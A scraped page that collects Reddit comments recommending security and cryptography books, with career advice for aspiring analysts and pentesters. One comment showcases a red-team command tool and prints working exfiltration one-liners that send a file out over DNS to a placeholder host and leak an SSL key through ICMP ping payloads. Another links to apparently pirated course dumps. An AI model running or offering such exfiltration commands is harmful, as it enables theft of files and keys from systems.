Best computer security & encryption books according to redditors
We found 323 Reddit comments discussing the best computer security & encryption books. We ranked the 67 resulting products by number of redditors who mentioned them. Here are the top 20.
Here's a short reading list I created yesterday about protecting your privacy:
Darknet: A Beginner's Guide to Staying Anonymous
How to Disappear: Erase Your Digital Footprint, Leave False Trails, And Vanish Without A Trace
Obfuscation: A User's Guide for Privacy and Protest
Data and Goliath: The Hidden Battles to Collect Your Data and Control Your World
Complete Guide to Internet Privacy, Anonymity & Security
Tor and the Dark Art of Anonymity: How to Be Invisible from NSA Spying
Simon Singh explains.
edit: Hey, I didn't expect this to become the top comment. Neat. Might as well abuse it, by providing bonus material:
This is the same Simon Singh discussed in this recent and popular Reddit post; he is a superhero of science popularization. He has written some excellent and highly rated books:
(full disclosure: I have nothing to disclose, other than that I'm a fan of his work.)
The movie is okay as a movie, but as as far as historical value goes, it's more in the 'inspired by' category. They touch upon a few of the moments and ideas presented here, however.
For a more (and way more interestingly brought) in depth explanation, I can recommend 'The Code Book' by Simon Singh (amazon)
I'm the manager of application security and research at a mid-level software vendor with over 400 developers and testers and I want to recommend you ignore all of the more generic advice currently in this thread. As someone with coding experience and interest, you have a unique path to infosec that so many companies want, but find it extremely difficult to hire for.
Any company that ships software has to consider the security of their application - full stop. Most rely on scanners or annual third-party vulnerability assessments for this, but obviously that falls short. They need people who can build security in from an architectural standpoint. Someone who can actually implement the fixes suggested by the above methods, and ideally, someone who can help implement security as an integral part of the SDLC instead of as a bolt-on premise.
My recommendation is to make your way through 24 Deadly Sins of Software Security and The Web Application Hacker's Handbook. If you can understand the bulk of concepts in these two books, you'll be leagues ahead of almost any developer you find yourself up against in a hiring scenario. For the coup de gras, learn about threat modeling. It's a great way to teach other developers and testers security and to build security into any system during design instead of post-release. Check out this book which is actually probably a little too comprehensive, use this card game from Microsoft (it seems silly, but I promise you it works), and watch this talk one of the guys on my team gave at BSides Cincinnati.
If you have any questions, PM me.
Aloha everyone, I would like to introduce a little tool i've been working on : rtfm.py
https://github.com/leostat/rtfm | https://necurity.co.uk/osprog/2017-02-27-RTFM-Pythonized/
The program aims to give you a database of helpful commands, references, cheatsheets and tips in an indexed, easy to search format.
You can search through the database using one or more of; The command, tags, URL's, references, author, date added, or, Comments to get the information you need. At the moment it has around 500 commands in it, and it comes with an updater to allow me to push more content to it from github.
At the moment its not perfect, with the code probably being a tad into the horrendous category, but it works! As a quick example, you may be on a box and wanting to exfil some data, for some odd reason you don't have internet access, but rtfm to the rescue!
12:10:root:rtfm: ./rtfm.py -R exfil
++++++++++++++++++++++++++++++
Command ID : 384
Command : for line in
base64 -w 62 [file]; do host $line.[hostname]; doneComment : exfil file through DNS, may want to encrypt, also assuming you have a short domain
Tags : linux,bash,loop,interesting
Date Added : 2017-06-18
Added By : Innes
References
__
https://www.amazon.co.uk/Rtfm-Red-Team-Field-Manual/dp/1494295504
++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++
Command ID : 386
Command : ping -p 11010101010101010101010101010199 -c 1 -M do 127.0.0.1 -s 32; for line in
base64 sslfile.key | xxd -p -c 14; do line2=echo "11 $line 99" |tr -d ' '; ping -p $line2 -c 1 -M do 127.0.0.1 -s 32; done; ping -p 11101010101010101010101010101099 -c 1 -M do 127.0.0.1 -s 32Comment : Exfil over icmp
Tags : linux,networking,loop,interesting
Date Added : 2017-06-18
Added By : Innes
References
__
https://www.amazon.co.uk/Rtfm-Red-Team-Field-Manual/dp/1494295504
++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++
Command ID : 496
Command : for line in $(tshark -r [pcap] -T fields -e data | uniq | grep -v "......................................................" | sed s/.11/11/g | grep "11.99" | sed s/11// | sed s/99$// | tr -d '\n' | sed s/0101010101010101010101010101/'\n'/g |sed s/010101010101010101010101010//g); do echo $line | xxd -r -p | base64 -d;echo +++++++++++++++++++; done
Comment : Convert exfil ICMP back to files from pcap
Tags : linux,networking,loop
Date Added : 2017-06-18
Added By : Innes
References
__
https://ask.wireshark.org/questions/15374/dump-raw-packet-data-field-only
++++++++++++++++++++++++++++++
Throughout the program I have tried to include references to where the commands have come from, however this has not always been possible. If you spot a missing reference or nod, please let me know and I will add it in!
There are a few bugs in the code i'm aware of, and a couple of things I need to add still but let me know what you think! If you like it, awesome, if you don't then boo. Have a look, and let me know what you think with any suggestions, or if your feeling nice, submit content for the database / suggestions or code to improve the program.
Have a great day all!
It did something more clever than just that, it spun up the centrifuges in 'waves' so that they would fail at a slightly increased rate, but unlikely to be noticed in a daily operations manner.
Countdown to Zero Day is a great read on it.
Unfortunately, there was blood spilled (although it could be argued as a multi-prong approach to neutralize the nuclear capabilities, this may be considered separate from stuxnet).
Worthwhile sidebar: "anonymized" data is almost never actually anonymous. Sorry for the extensive quote, but it's really relevant here. From Bruce Schneier's excellent book, Data and Goliath:
> "Most techniques for anonymizing data don't work, and the data can be de-anonymized with surprisingly little information.
> "In 2006, AOL released three months of search data for 657,000 users: 20 million searches in all. The idea was that it would be useful for researchers; to protect people's identity, they replaced names with numbers. So, for example, Bruce Schneier might be 608429. They were surprised when researchers were able to attach names to numbers by correlating different items in individuals' search history.
> "In 2008, Netflix published 10 million movie rankings by 500,000 anonymized customers, as part of a challenge for people to come up with better recommendation systems than the one the company was using at that time. Researchers were able to de-anonymize people by comparing rankings and time stamps with public rankings and time stamps in the Internet Movie Database.
> "These might seem like special cases, but correlation opportunities pop up more frequently than you might think. Someone with access to an anonymous data set of telephone records, for example, might partially de-anonymize it by correlating it with a catalog merchant's telephone order database. Or Amazon's online book reviews could be the key to partially de-anonymizing a database of credit card purchase details.
> "Using public anonymous data from the 1990 census, computer scientist Latanya Sweeney found that 87% of the population in the United States, 216 million of 248 million people, could likely be uniquely identified by their five-digit ZIP code combined with their gender and date of birth. For about half, just a city, town, or municipality name was sufficient. Other researchers reported similar results using 2000 census data.
> "Google, with its database of users' Internet searches, could de-anonymize a public database of Internet purchases, or zero in on searches of medical terms to de-anonymize a public health database. Merchants who maintain detailed customer and purchase information could use their data to partially de-anonymize any large search engine's search data. A data broker holding databases of several companies might be able to de-anonymize most of the records in those databases.
> "Researchers have been able to identify people from their anonymous DNA by comparing the data with information from genealogy sites and other sources. Even something like Alfred Kinsey's sex research data from the 1930s and 1940s isn't safe. Kinsey took great pains to preserve the anonymity of his subjects, but in 2013, researcher Raquel Hill was able to identify 97% of them.
> "It's counterintuitive, but it takes less data to uniquely identify us than we think. Even though we're all pretty typical, we're nonetheless distinctive. It turns out that if you eliminate the top 100 movies everyone watches, our movie-watching habits are all pretty individual. This is also true for our book-reading habits, our Internet-shopping habits, our telephone habits, and our web-searching habits. We can be uniquely identified by our relationships. It's quite obvious that you can be uniquely identified by your location data. With 24/7 location data from y our cell phone, your name can be uncovered without too much trouble. You don't even need all that data; 95% of Americans can be identified by name from just four time/date/location points.
> "The obvious countermeasures for this are, sadly, inadequate. Companies have anonymied data sets by removing some of the data, changing the time stamps, or inserting deliberate errors into the unique ID numbers they replaced names with. It turns out, though, that these sorts of tweaks only make de-anonymization slightly harder.
> "This is why regulation based on the concept of 'personally identifying information' doesn't work. PII is usually defined as a name, unique account number, and so on, and special rules apply to it. But PII is also about the amount of data; the more information someone has about you, even anonymous information, the easier it is for her to identify you."
So I would remove the first part of your explanation, and just go with "it's basically making what they are already doing/have been doing for who knows how long legal." It gives the government explicit permission to collect all your Internet activity and searches.
> creating a strong cryptography algorithm is primarily trial and error
I don't think it's trial and error, more like a series of steps in which each is designed to befuddle a particular class of attack that may have been successful on previous iterations. This sort of goes back to the Cold War and even WWII—a code like Enigma was the scramblers and the plugboard, where the plugboard was specifically added to foil a type of dictionary attack.
Anyhow, not that I really know too much about it, but this is a fantastic book on the topic.
It really depends on what niche you're looking on covering. It's difficult, I feel, to brush up on "infosec" to any level of practical proficiency without focusing on a few subsets. Based on your interests, I would recommend the following books.
General Hacking:
Hacking Exposed
The Art of Exploitation
The Art of Deception
Intrusion Detection / Incident Response:
Network Flow Analysis
The Tao of Network Security Monitoring
Practical Intrusion Analysis
Real Digital Forensics
Reverse Engineering:
Reversing: Secrets of Reverse Engineering
The Ida Pro Book
Malware Analyst Cookbook
Malware Forensics
Digital Forensics:
File System Forensic Analysis
Windows Forensic Analysis
Real Digital Forensics
The Rootkit Arsenal
Hope this helps. If you're a University student, you might have access to Safari Books Online, which has access to almost all of these books, and more. You can also purchase a personal subscription for like $23 a month. It's a bit pricey, but they have an awesome library of technical books.
Hey man! I work as Security Analyst - about a year away from graduating with my Bachelors.
I suggest you pick up the CompTIA Security+ Certification, as well as start learning the basics of Networks and how they function. Learn ports and protocols, as well as how IDS/IPS/Firewalls function. This will get you an entry level role as a Jr Analyst. I suggest you use [http://www.professormesser.com/security-plus/sy0-401/sy0-401-course-index/](Professor Messers Security+ Videos) This will teach you the basics of security work, networking concepts, threats, etc.
At the same time start listening to podcasts like Paul's Security Weekly, Down the Security Rabbit Hole, etc. As well as start reading blogs on hacking to get a feel for whats done.
Get a home lab and learn a few tools like Wireshark and Nmap for basic Security Analyst work - to learn how packets work, how they are structured, and how to scan pc's for ports and services. At the same time, focus on learning about threats and vulnerabilities (which are covered in security+).
If you want to get into PenTesting then you need a wide range of knowledge. Pick up and learn a few languages (master the basics and understand what the code does and how to read/interpret it). You need to know: PHP, HTML, SQL, Python (or Ruby), and a basic language like C, or Java.
If you want to dig deeper into PenTesting then start reading: https://www.offensive-security.com/metasploit-unleashed/
Good way to get into the Kali Distro and learn how to run Metasploit against vulnerable VM's.
Take a look at https://www.vulnhub.com/resources/ for books, and vulnerable VM's to practice on.
https://www.cybrary.it/ is also a good place with tons of videos on Ethical Hacking, Post Exploitation, Python for Security, Metasploit, etc.
Pick up some books such as
The Hacker Playbook 2: Practical Guide To Penetration Testing
Hacking: The Art of Exploitation
Black Hat Python: Python Programming for Hackers and Pentesters
Rtfm: Red Team Field Manual
The Hackers Playbook and The Art of Exploitation are great resources to get you started and take you step by step on pen testing that will allow you to alter explore the endless possibilities.
Also a good list of resources that you can learn more about security:
Getting Started in Information Security
Pentester Labs
Awesome InfoSec
Awesome Pentest
Overall experience and certification are what will get you into the door faster. Most employers will look for experience, but if they see you have motivation to learn and the drive to do so, then they might take you. Certifications also are big in the infosec field, as they get you past HR. And having a home lab and doing side projects in security also reflects well.
If that interests you, you should read The Code Book by Simon Singh. Great history of cryptography with a lot of well explained examples. He also wrote a great book about Fermat's Last Theorem.
I am also fairly new to the subject. The first book I read on it was The Code Book by Simon Singh. I highly recommend it.
It was written in 1999, and is not an up-to-date, hands-on resource for encryption software. It is more of a primer on the history and evolution of codes and encryption, with great explanations of the foundations of the psychology and mathematics of codes. It's well written, a fun read, and very informative for beginning studies.
I hope it's ok in this sub to post a link to it. It's a non-affiliate Amazon link:
http://www.amazon.com/The-Code-Book-Science-Cryptography/dp/0385495323
Copy paste from a post I made earlier
Malware RE isn't really all that much voodoo as it seems, you take the executable and break it down into steps.
First check out the PE headers and find what strings you can, characteristics. Figure out if the malware is packed or not.
A quick and dirty way to get an idea of what it does it run it with certain tools on the system and a linux box to intercept all network communications. This is called behavioral analysis.
After that you can load it into a disassembler like IDA Pro and start looking for interesting functions or windows API calls. Things like WriteFile, VirtualAllocEx, ReadFile then figure out that they are doing.
After that you can take it into your debugger (I like OllyDbg) and set some breakpoints at interesting functions to see what the malware is doing in the stack. Like I said, its not voodoo once you look into it further.
Creating the malware is a whole different story and outside my skill set. In fact I hate programming and know only high level programming, basically I can interpret code and what it wants to do. But I have an easier time reading Assembly (lol) than something like C++. But coding malware is just like coding anything else, design it for what you want it to do and get to work. Stuff like Stuxnet had probably at a minimum 10 extremely talented coders behind it.
Here is a great list of learning sources.
Cybrary.it Malware Analysis Course - Free
Opensource Malware Analysis Course - Free
Dr. Fu's Malware Analysis Course - Free
OpenSecurityTraining.info - Free
SANS FOR610 Reverse Engineering and Malware Analysis - Expensive
Practical Malware Analysis
Practical Reverse Engineering
Malware Analyst's Cookbook
If you want to read a sourced book on this kind of stuff: Countdown to Zero Day
Well-sourced and talks about the 0-day exploit marketplace in great detail. Also goes into the history of cyber warfare, the Iranian nuclear program, and much more. You should have a basic understanding of how computers and malware work before reading this book, but this book does an incredible job of taking the hyper-technical details and explaining them to the layman. It is well-sourced, informative and terrifying.
Sourcing is something that Snowden has apparently forgotten in the cold wastes of Russia. The thing is, its NOT just the USA and its Allies. If we were to stop buying exploits, we would be falling behind in the coming electronic battles. I don't feel great about this. The only way to really fix this is to get companies (Apple, Google, Microsoft, et al) to pay higher bounties for exploits. Why claim a 3K bounty when a black hat will pay 20K, or why claim the 20K when the grey market governments can offer upwards of 500K for good 0-day exploits. Companies need to raise their bounties to match market forces. Governments aren't finding the exploits, they are buying them.
If you want to pick up some Cryptography, The Code Book is a great intro.
Pragmatic Thinking and Learning is good for learning to learn.
The Pragmatic Programmer is good for project code planning and learning how to write code in a well thought out way.
Ethernet: The Definitive Guide is a good read if you want to get up to snuff on your networking, though it can be a bit dry at times.
For reverse engineering:
For malware analysis and malware techniques
For programming
This should be enough for you to get started.
Follow the link for short answer, to quench your curiosity read the book Count Down to Zero Day by Kim Zetters, which is an in-dept account of Stuxnet and how it was carried out, I can guarantee it will knock your socks off!!
http://www.darkreading.com/vulnerabilities-and-threats/so-you-want-to-be-a-zero-day-exploit-millionaire/d/d-id/1101256?
http://www.wired.com/2014/09/kevin-mitnick-selling-zero-day-exploits/
http://www.wired.com/2014/11/countdown-to-zero-day-stuxnet/
http://www.amazon.com/Countdown-Zero-Day-Stuxnet-Digital/dp/077043617X
Here are a few books I recommend:
Blue Team Handbook
Defensive Security Handbook
The Practice of Network Security Monitoring
Crafting the Infosec Playbook
And don't forget the NIST Cyber Security Framework
Have you read Blue Team Handbook? It could be a good place to start and I'm guessing your company can swing you $15
If you're looking for a book that teaches you about codes and practical codebreaking, here are two greats: Cryptanalysis: A Study of Ciphers and Their Solution, by Helen Fouché Gaines and Codes, Ciphers and Secret Writing, by Martin Gardner.
For a historical look try The Code Book: The Science of Secrecy from Ancient Egypt to Quantum Cryptography, by Simon Singh. I really loved that one!
I've read a few books about WW2 tech and I can't remember exactly which one talked about it - it may have been Alan Turing: The Enigma, or perhaps Simon Singh's The Code Book. I tried searching online but I can't find anything for some reason :/ I hope whichever book wrote about it didn't make it up.
Red Team Field Manual
The blue team field manual is a great book
Edit:
Here's the link
https://www.amazon.com/dp/154101636X/ref=cm_sw_r_cp_api_gz4-zbSCWC8E4
Though not really geared to compsci, The Code Book is a great history of cryptography and cryptanalysis from the dawn of time to current. Excellent read.
I highly recommend "The Code Book" to any novices interested in this sort of thing, it's readable and entertaining without being insulting or excessively complex.
Anyone interested in this topic should read the codebook. As I remember the polish were the first to crack it, but after improvements of the enigma system they didn't have the resources to crack it anymore. The British built upon the polish success and threw lots of money and talent at it such that they could crack all oncoming versions - with the exception of the German navy that used the best version of Enigma (and had better practices in place).
A good text for beginners is Simon Singh's The Code Book.
The Code Book: The Science of Secrecy from Ancient Egypt to Quantum Cryptography is a good book to learn the history and some of the concepts behind cryptography.
The Code Book: The Science of Secrecy from Ancient Egypt to Quantum Cryptography is excellent if you’re interested in this stuff. It takes you through the history of encryption and explains everything well.
Here are some resources I've found especially helpful for my own puzzle-making and codebreaking endeavors.
General Overviews and Websites for Getting Started:
Basic Cryptanalytic Techniques:
Beginner Hand-cracking Tutorials:
Tools for Creating and Cracking Codes Quickly:
Interesting Cryptographic Puzzles/Methods for Inspiration:
Books for Learning:
Books for Puzzle Solving:
Games:
EDIT: Fixed a link and made a couple minor touch-ups.
Some thoughts:
I've had people recommend the following books:
Other resources:
Alright for hacking... It's a LOTTT of stuff you'll need to learn, everything from hacking wifi, hacking websites, cracking passwords. But really all a hacker is, is someone who knows the system so well they can exploit and break it.
What kind of people are hackers/pen-testers?
Unless your job title is literately "red-teamer, or pentester" then "hackers" are usually security researchers, white hats, security analysts, hobbyists, people who tinker around. But really all hackers are, are computer nerds who love this stuff, this is what we live for. So just don't do anything stupid and don't do anything illegal.
Here is some of the big areas you'll need to learn:
Networking / Network security
Linux / Windows (https://linuxjourney.com is amazing) I learned a ton by creating my own custom Debian based Linux Disro.
Forensics
Cryptography / Stenography
Malware / Malware analysis
System hardening / system security
Privacy techniques (Being safe, Tor, Tails, what you share on social media)
Exploiting services, exploiting machines
Wireless attacks (WEP, WPA, WPA2)
Common vulnerabilities, and exploits
How to use google. (Like dorking, Shodan, using online resources)
Maybe some basic python and scripting
Basic security concepts like NIPS, NIDS, SIEMS, mitigation, security policies.
Common ports and services (You can find flashcards on Quizlet)
https://www.cybrary.it/course/intro-to-infosec
https://www.cybrary.it/course/kali-linux-fundamentals
https://www.cybrary.it/course/ethical-hacking
https://www.cybrary.it/course/comptia-aplus
https://www.cybrary.it/course/comptia-902-2018
https://www.cybrary.it/course/comptia-network-plus
https://www.cybrary.it/course/comptia-security-plus
https://www.cybrary.it/course/comptia-cysa-2018
https://www.udemy.com/pentestplus
https://www.udemy.com/ccna-on-demand-video-boot-camp
https://www.youtube.com/watch?v=wBp0Rb-ZJak (The Complete Linux Course: Beginner to Power User)
Also check out
https://www.youtube.com/user/professormesser
https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q (Hackersploit)
https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w (LiveOverflow)
https://www.youtube.com/playlist?list=PLG49S3nxzAnmpdmX7RoTOyuNJQAb-r-gd (Messer, Networking)
https://www.youtube.com/watch?v=vrh0epPAC5w (Animated full Network+ course)
www.reddit.com/r/netsec
www.reddit.com/r/netsecstudents
www.reddit.com/r/comptia
www.reddit.com/r/linux
150 dumped full courses for free
-https://pastebin.com/j0WVfDif
(my favorites)
http://www.mediafire.com/download/2kczrn29gt6fdp3/Introduction+to+Firewalls.rar
http://www.mediafire.com/download/mnulcdbw817f9q0/Metasploit+Basics.rar
http://www.mediafire.com/download/lhajdkufn9oi5ta/Cisco+CCNA+Security%3B+Firewalls+and+VPNs.rar
http://www.mediafire.com/download/yraijpmuzoa1zpn/Cisco+CCNA+Security%3B+Introduction+to+Network+Security.rar
Practice the skills you learn with CTF'S (Capture the flag)
https://www.hackthebox.eu
https://www.hackthissite.org
http://overthewire.org
https://picoctf.com
https://www.vulnhub.com
http://www.dvwa.co.uk
https://pwnable.tw
Start researching and studying for certifications, COMPTIA, CISCO, REDHAT
https://certification.comptia.org/certifications/security
https://certification.comptia.org/certifications/cybersecurity-analyst
https://certification.comptia.org/certifications/pentest
https://www.cisco.com/c/en/us/training-events/training-certifications/certifications/associate/ccna-routing-switching.html
The intro/easy certs are
Comptia A+ (Hardware, basic computers stuff, cables and stuff)
Comptia Network+ (Networking, network topologies, types, subnetting, vlans, dmz's)
Comptia Security+ (Malware types, threads, attacks, policies)
A bit hard and better certs
Cisco CCNA Cyber ops
Comptia CYSA+ (Security analyst stuff, the security+ but much more in depth)
Comptia Pentest+ (Pentesting tools, methodology, steps, ect.)
eLeanSecurity eJPT (junior pentesting cert)
ecouncil CEH (Good for DoD jobs, kinda outdated tho, hacking stuff)
Now it gets pretty advanced
Comptia CASP+ (advanced methods, concepts, techniques regarding security)
OCSP (Oooh the cool kinds have this one, pentesting galore < msut have)
Comptia CISSP (HR and people love this one, high level cert)
GPEN
GIAC
My recommended pathway is Security+ > Cysa+ > Pentest+ > CEH > CASP+ > OCSP > CISSP
Here is Comptia's recommended pathway .PDF
Start to learn a programming language
Python is highly recommended for people who are looking for a first language because:
It’s easy to learn.
It’s great for scripting.
It can be used for just about anything.
https://www.python.org
https://www.youtube.com/watch?v=rfscVS0vtbw (4 hour nice intro to Python course)
Depending how deep you go you might need to learn C and or Assembly, both are commonly used for malware analysis, reverse engineering, binary exploitation, and exploit development. This also will require you to learn things like GCC, GDB, IDA, Hopper, and all the fun stuff. But this can be really really hard to learn, but is incredibly rewarding.
I can always recommend the Red team Field manual.
https://www.amazon.com/dp/1494295504/ref=cm_sw_r_cp_awdb_t1_2cXvCbPQCA1NC
Some nice cheatsheets I have printed out.
https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf
https://blogs.sans.org/pen-testing/files/2013/10/NmapCheatSheetv1.0.pdf
https://www.loggly.com/wp-content/uploads/2015/05/Linux-Cheat-Sheet-Sponsored-By-Loggly.pdf
This is one of my security starter trifecta:
Hacking: The Art of Exploitation
Rtfm: Red Team Field Manual
Blue Team Handbook: Incident Response Edition
Check out
The Rootkit Arsenal
This book is excellent for understanding windows internals from a malware perspective. See if you can find a digital version of the 1st edition as the new release doesn't look like its out yet http://www.jblearning.com/catalog/9781449626365/
Bill Blunden covers so much information in this book its amazing. Check out his webpage also http://www.belowgotham.com/Pubs.htm
The Malware Analyst's Cookbook you currently own is probably the best book on breaking down and understanding malware. Blundens RootKit Arsenal book is probably the best book for creating malware/rootkits. Those two books will give you all the information you need for starting.
Some good readings from the University of Cambridge Mathematical reading list and p11 from the Studying Mathematics at Oxford Booklet both aimed at undergraduate admissions.
I'd add:
Prime obsession by Derbyshire. (Excellent)
The unfinished game by Devlin.
Letters to a young mathematician by Stewart.
The code book by Singh
Imagining numbers by Mazur (so, so)
and a little off topic:
The annotated turing by Petzold (not so light reading, but excellent)
Complexity by Waldrop
If you're at all interested in encryption, The Code Book is a great place to start.
The Code Book, which is a nonfiction book about the history and mathematics of secret codes and how to break them, ranging from the earliest and simplest codes, up through the Engima machine and the first computers, through modern RSA, PGP, and (the hypothetically unbreakable) Quantum Cryptography.
I post this because this is the money system of a libertarian society, and we might have to think about some solutions to the problems he's outlining here. Also, this isn't just some ignorant NY Times reporter, this is the guy that wrote the book on cryptography. Applied Cryptography was, and still is, one of the first books people recommend on cryptographic protocols, so it seems like a good idea to consider what he has to say on the subject.
http://www.amazon.com/America-Vulnerable-Digital-Espionage-Warfare/dp/159420313X
China, like many other countries don't have the legal wall erected between intelligence services and corporations that we do. There are dozens of examples of even European governments using their intel agencies to steal trade and corporate secrets. Don't get me wrong, I think the US spies on privately held companies as much as the next guy but the information gleamed there is duly classified and not available to anyone without clearance.
There has been for many years.. by many I mean at least a decade and it has cost at minimum hundreds of billions of dollars.
China famously stole a lot of data about the worlds most expensive military projects in history from the US.. really good hackers and an entire military power to finance it does give results.
New York Times Best Seller - Cyber Warfare
The former 'IT Security' guy to the White House has a lot of really interesting material too, showing how massive of an issue it is for both the government and corporations.
Cracking the Coding Interview: More to help you get a job as a Software Engineering, but full of fun problems even if you do them just for the challenge and learning.
The Code Book: A great overview of the history of Cryptography.
Yes.
Hacking Exposed
Shellcoders Handbook
Reverse Engineering
Malware Analyst's Cookbook
Gray Hat Python
Gray Hat Hacking Second Edition
Writing Security Tools & Exploits
Sockets, Shellcode, Porting and Coding: Reverese Engineering Exploits and Tool Coding for Security Professionals
Professional Penetration Testing
These are definitely some books you could start with. Once you've gone through those, you'll know more then a lot of them out there :)
There's these reddit threads on r/netsec:
http://www.reddit.com/r/netsec/comments/d3hua/how_to_get_started_in_netsec/
http://www.reddit.com/r/netsec/comments/ekyjw/interested_in_learning_about_network_security/
http://www.reddit.com/r/netsec/comments/es4si/what_are_some_good_netsec_books_out_there/
http://www.reddit.com/r/netsec/comments/g6r71/getting_started_in_network_security_a_list_of/
There's also loads of blogs and websites around, if you go hunting or look at some of these netsec threads, you'll find loads more material.
Starter for 10;
https://www.amazon.co.uk/Rtfm-Red-Team-Field-Manual/dp/1494295504
https://www.amazon.co.uk/Blue-Team-Handbook-condensed-Responder/dp/1500734756/ref=sr_1_1?s=books&amp;ie=UTF8&amp;qid=1485807594&amp;sr=1-1&amp;keywords=blue+team+incident+response
That should start the digging of the rabbit hole.
Edit: I should elaborate a bit, I've been purposefully obtuse. What makes a good Security Engineer? Curiosity, wanting to know how things work, understanding how things tick and really get under the hood of what makes those ones and zeros truly shine. If the above two doesn't get your curious and open your eyes to the MASSIVE amount of learning you need to do, as well as the potential rewards/pitfalls/overwhelming feelings, then move along. ;-)
Given your background as a programmer, I would recommend starting with SQL exploits. You need to have at least a working knowledge in how programs and script work, and it gives you the framework for understand how to be clever with the existing code logic and how to think outside the box.
If that ends up being too easy or once you get a good handle on that, take a look at metasploit and the exploit database associated with that. Rather than just using the exploits, look at the code and get an idea of how the individual exploits work (which are all the same on the base level: using logic in a creative way the original programmers didn't think of or intend).
As for books, I recommend This One as a primer. It's not exactly up to date, but the theory is sound (giving you a solid foundation on how exploits are made and the thought process behind them).
I really like This One for learning metasploit and getting a further understanding of exploit scripts.
And I just love This Book in general. Once you take a look, you'll see why.
Those are paid books, This subreddit is not for piracy(See sidebar) but incase you couldn't find them on Amazon:
http://www.amazon.com/Firewalls-Dont-Dragons-Step-Step-ebook/dp/B00SIA1RH4
http://www.amazon.com/Blue-Team-Handbook-Condensed-Responder/dp/1500734756
This little guy is amazing. And cheap.
"The Code Book" by Simon Singh is a really great introduction via the history of cryptography. It covers a lot of old codes and how they are broken in detail, and then touches on more modern cryptography towards the end. It has a great bibliography to springboard you toward more detailed knowledge.
Not sure if you are into security tech but some of my favorites....
Also thought I'd include some that I have purchased but not finished yet in case you'd be interested.
I disagree with the conclusion of that article. It's basically arguing the semantics of what is a weapons program. The Iranians were attempting to enrich much more uranium than was needed for their domestic energy program - why would they be attempting to manufacture it in such excessive quantities? Beyond that, the material they need for domestic energy production is readily available for reasonable prices, so the need for internal production was always dubious at best. So just because they weren't actively launching test missiles like North Korea is, doesn't mean they weren't suspiciously ramping up production of components of nuclear weapons. Your article supports this conclusion:
> “The JCPOA imposes measures that constrain Iran’s nuclear energy program to provide confidence that the program remains peaceful,”
Beyond even all that, the article claims that in 2007 (Dec), the US intelligence agencies had declared that the program had been 'halted', not that it never existed - so the threat of a program did exist. This is also the same time frame that Stuxnet was being developed, and when it was deployed, it in essence, constrained Iran’s nuclear energy program, but severely hindering the amount of uranium they could enrich.
I don't bother with any podcast, I read books instead, like this one, which has 448 pages (how long is that in minutes?) of info about Stuxnet, what it did, how it did it, etc.
What most consider the original is actually titled:
More recently, there have been several excellent titles. My suggestion is stick to non fiction as it will truly scare the yell out of you.
Almost everything by Bruce
I can recommend more but these are good starting points. Fiction is fun but for pure terror, grasping what these authors are revealing is the key.
Everyday Cryptography
I found this book to be excellent:
https://www.amazon.com/Everyday-Cryptography-Fundamental-Principles-Applications/dp/0199695598/
I have a strong programming background but not such a strong maths background. I found the book to be technical (explaining the different ciphers, different modes, etc) without dwelling on the maths. The first section seemed a little slow but I was glad that I read it because it was all relevent later on
The Code Book for a primer on the basics up through some simple explanations of modern computer cryptography and the Handbook of Applied Cryptography for serious math proofs of a lot of the modern crypto standards in use today.
https://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323/ref=asap_bc?ie=UTF8
This book is great. I read it a number of years ago and couldn't get enough.
I first heard about the french 'La disparition' and the translated 'A Void' in The Code Book by Simon Singh (which in itself is a great book) in the chapter describing frequency analysis with regard to cryptanalysis. [With 'e' being the most frequently used letter in english.]
If you want background reading about the history try 'the code book' http://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323 I found it really interesting when I first read it, It is easy to read and got me interested in the subject.
a book like this one is good: http://www.schneier.com/book-applied.html for a general treatment.
It's really Comp Sci, but I really enjoyed The Code Book. Goes over secret codes over time, starting with the basics, ends with Cryptography, goes over some of Alen Turing's work. Over all a good, fascinating read.
If you enjoy Simon Singh, check out The Code Book.
Article: http://www.bbc.co.uk/history/topics/enigma
Movie: The imitation game
Book : Simon Singh - The Code Book
https://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323/ref=mp_s_a_1_2/138-6683061-6847431?ie=UTF8&amp;qid=1541615715&amp;sr=8-2&amp;pi=AC_SX236_SY340_FMwebp_QL65&amp;keywords=simon+singh&amp;dpPl=1&amp;dpID=51CC3yLf5mL&amp;ref=plSrch
is it this one?
https://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323
In addition to illusory script and other magical solutions (possibly even layered on top of them for added security), check out some historical spy stuff:
https://en.wikipedia.org/wiki/Steganography
I also really recommend The Code Book:
https://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323/
These might interest you:
Poincare's Prize
Prime Obsession
Fermat's Enigma
The Code Book
Simon Singh's book is fantastic. It was one of my early reads in the field of crypto. I read it when I was in middle school so I don't think it would be too techy for you! But it covers a ton of topics, including topics that will be relevant into the future. So in short: yes, buy it.
EDIT: It occurred to me that I read one of Simon's earlier works, I think it's part of the same series? Anyway, my recommendation is: https://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323
> I have zero Linux experience. How should I correct this deficiency?
First, install a VM (Oracle OpenBox is free) and download a linux ISO and boot from it. Debian and Ubuntu are two of my favorites. Both are totally free (as are most linux distros). Once installed, start reading some beginner linux tutorials online (or get "Linux In A Nutshell" by O'Reilly).
Just fuck around with it... if you screw something up, blow it away and reinstall (or restore from a previous image)
> Is it necessary? Should I start trying to make Linux my primary OS instead of using windows, or should that come later?
It's not necessary, but will help you learn faster. A lot of security infrastructure runs on Linux and UNIX flavors. It's important to have at least a basic understanding of how a Linux POSIX system works.
> If you can, what are some good books to try to find used or on PDF to learn about cissp and cisa? Should I be going after both? Which should I seek first?
You don't need to worry about taking & passing them until you've been working in the field for at least 3-5 years, but if you can get some used review materials second-hand, it'll give you a rough idea what's out there in the security landscape and what a security professional is expected to know (generally)
CISSP - is more detailed and broader and is good if you're doing security work day-to-day (this is probably what you want)
CISA - is focused on auditing and IT governance and is good if you're an IT Auditor or working in compliance or something (probably not where you're headed)
> What are good books I can use to learn about networking? If you noticed I ask for books a lot its because the only internet I have is when I connect my android to my laptop by pdanet, and service is sketchy at my apartment.
